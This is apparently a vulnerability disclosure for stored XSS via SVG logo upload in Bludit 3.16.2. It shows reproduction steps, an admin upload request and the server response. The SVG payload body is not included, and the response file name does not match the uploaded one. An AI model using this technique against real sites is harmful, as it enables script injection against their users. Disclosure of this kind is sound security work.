# Exploit Title: XSS via SVG File Upload - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ XSS via SVG File Upload #1: Steps to Reproduce: 1. Login with admin account and click on "General" > "Logo" // HTTP POST Request Uploading the SVG File POST /bludit/admin/ajax/logo-upload HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 [...] ------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4 Content-Disposition: form-data; name="tokenCSRF" 59fc6f48ad5d60b39699491cada2390e1b42531b ------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4 Content-Disposition: form-data; name="inputFile"; filename="evilsvgfile-xss-bypass.svg" Content-Type: image/svg+xml ------geckoformboundarye27e3ffc54c763baa293ac2aeb3ed1a4-- // HTTP Response HTTP/1.1 200 OK Date: Sat, 28 Jun 2025 21:16:10 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 [...] {"status":0,"message":"Image uploaded.","filename":"test.svg","absoluteURL":"http:\/\/192.168.58.133 \/bludit\/bl-content\/uploads\/test.svg","absolutePath":"\/opt\/lampp\/htdocs\/bludit\/bl-content\/uploads\/test.svg"}